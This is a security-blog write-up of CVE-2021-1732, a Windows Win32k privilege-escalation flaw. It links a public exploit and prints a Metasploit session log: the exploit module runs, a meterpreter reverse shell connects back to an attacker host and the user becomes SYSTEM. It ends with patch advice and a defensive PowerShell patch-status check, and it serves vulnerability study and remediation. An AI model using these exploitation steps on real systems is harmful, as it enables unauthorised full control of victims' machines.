
CVE-2021-1732: Windows Win32k Privilege Escalation

Original

Author: Al1ex

Last modified: 2021-04-01 09:49:51

Column: 网络安全攻防 (Network Security Attack and Defense)

Affected Scope

Windows Server, version 20H2 (Server Core Installation) 

Windows 10 Version 20H2 for ARM64-based Systems 

Windows 10 Version 20H2 for 32-bit Systems 

Windows 10 Version 20H2 for x64-based Systems 

Windows Server, version 2004 (Server Core installation) 

Windows 10 Version 2004 for x64-based Systems 

Windows 10 Version 2004 for ARM64-based Systems 

Windows 10 Version 2004 for 32-bit Systems 

Windows Server, version 1909 (Server Core installation) 

Windows 10 Version 1909 for ARM64-based Systems 

Windows 10 Version 1909 for x64-based Systems 

Windows 10 Version 1909 for 32-bit Systems 

Windows Server 2019 (Server Core installation) 

Windows Server 2019 

Windows 10 Version 1809 for ARM64-based Systems 

Windows 10 Version 1809 for x64-based Systems 

Windows 10 Version 1809 for 32-bit Systems 

Windows 10 Version 1803 for ARM64-based Systems 

Windows 10 Version 1803 for x64-based Systems

Vulnerability Type

Local privilege escalation

Exploitation Conditions

The target runs one of the systems in the affected scope above

Vulnerability Overview

On 10 February 2021, Microsoft's regular patch release fixed a local privilege escalation vulnerability in Windows that lets a local attacker elevate to SYSTEM privileges. The root cause is reported to be in the Windows graphics driver function win32kfull!NtUserCreateWindowEx: a kernel callback into user mode that allocates memory is not kept in sync with the setting of the tagWND->flag attribute, so a forged tagWND->offset value can cause an out-of-bounds memory access.

Reproduction

Environment Setup

Download the Windows 10 1909 x64 operating system image from "MSDN I Tell You" (https://msdn.itellyou.cn/):

Then install the Windows 10 1909 image in a virtual machine to build the Windows 10 reproduction environment; the version information is shown below:

The current user's privileges are shown below:

Exploitation

Download the vulnerability EXP:

https://github.com/KaLendsi/CVE-2021-1732-Exploit

Then compile the EXP:

Running the EXP on Windows 10 successfully elevates to SYSTEM privileges:

MSF Framework

```text
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-JKM0HAD\aliddle
meterpreter > sysinfo
Computer        : DESKTOP-JKM0HAD
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background 
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2021_1732_win32k 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_1732_win32k) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/cve_2021_1732_win32k) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_1732_win32k) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/local/cve_2021_1732_win32k) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 7672 launched.
[*] Reflectively injecting the DLL into 7672...
[*] Sending stage (200262 bytes) to 192.168.159.66
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.66:60838) at 2021-03-15 17:56:28 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

Security Recommendations

Microsoft has released an update; systems in the affected scope can be patched via the update listed at:

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732
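As an added example (not part of the original post or of any linked project), the following PowerShell script is what an administrator can run on a Windows host to check whether its release falls within the affected scope listed above and whether any update from the 10 February 2021 patch cycle or later has been installed. The build-number-to-release mapping, the CurrentVersion registry key and Get-HotFix are standard Windows facts and are assumptions of this example rather than data from the post; the exact KB number and fixed build revision for each release must be taken from the MSRC advisory linked above.

```powershell
# Added example: host-side check for CVE-2021-1732 exposure and patch status.
# Assumption: the build-to-release table below is general Windows 10 versioning
# knowledge, not from the post; the KB for your release comes from the MSRC link.

# Release IDs the post lists as affected (Windows 10 and the matching Server releases).
$AffectedReleases = @('1803', '1809', '1909', '2004', '20H2')

# Build number -> release ID (assumed standard mapping; 17763 is also Windows Server 2019).
$BuildToRelease = @{
    17134 = '1803'
    17763 = '1809'
    18362 = '1903'
    18363 = '1909'
    19041 = '2004'
    19042 = '20H2'
}

# Read the installed build and update build revision (UBR) from the registry.
$cv      = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
$build   = [int]$cv.CurrentBuildNumber
$ubr     = $cv.UBR
$release = $BuildToRelease[$build]
if (-not $release) { $release = $cv.ReleaseId }   # fall back to the registry value

Write-Host "OS: $($cv.ProductName) build $build.$ubr (release $release)"

if ($AffectedReleases -contains $release) {
    Write-Host "Release $release is in the CVE-2021-1732 affected scope; verify the patch."
} else {
    Write-Host "Release $release is not in the affected scope listed in the post."
}

# The fix shipped in the 10 February 2021 cumulative updates, so updates installed on or
# after that date are a first indication. A definitive answer is comparing the UBR above
# with the fixed revision for this release from the MSRC advisory.
$patchDay = Get-Date '2021-02-10'
$recent = Get-HotFix |
          Where-Object { $_.InstalledOn -ge $patchDay } |
          Sort-Object InstalledOn |
          Select-Object HotFixID, Description, InstalledOn

if ($recent) {
    Write-Host "Updates installed on or after $($patchDay.ToShortDateString()):"
    $recent | Format-Table -AutoSize
} else {
    Write-Host "No updates recorded since $($patchDay.ToShortDateString()); treat the host as unpatched until confirmed."
}
```

Get-HotFix reads Win32_QuickFixEngineering, which does not record every update type, so an empty result is a prompt to check Windows Update history rather than proof that the fix is absent; the UBR comparison against the advisory's fixed build is the reliable check.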

Reference Links

https://github.com/rapid7/metasploit-framework/pull/14907

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1732

https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732

https://bbs.pediy.com/thread-266362.htm

Original statement: this article was published on the Tencent Cloud Developer Community with the author's authorization; reproduction without permission is prohibited.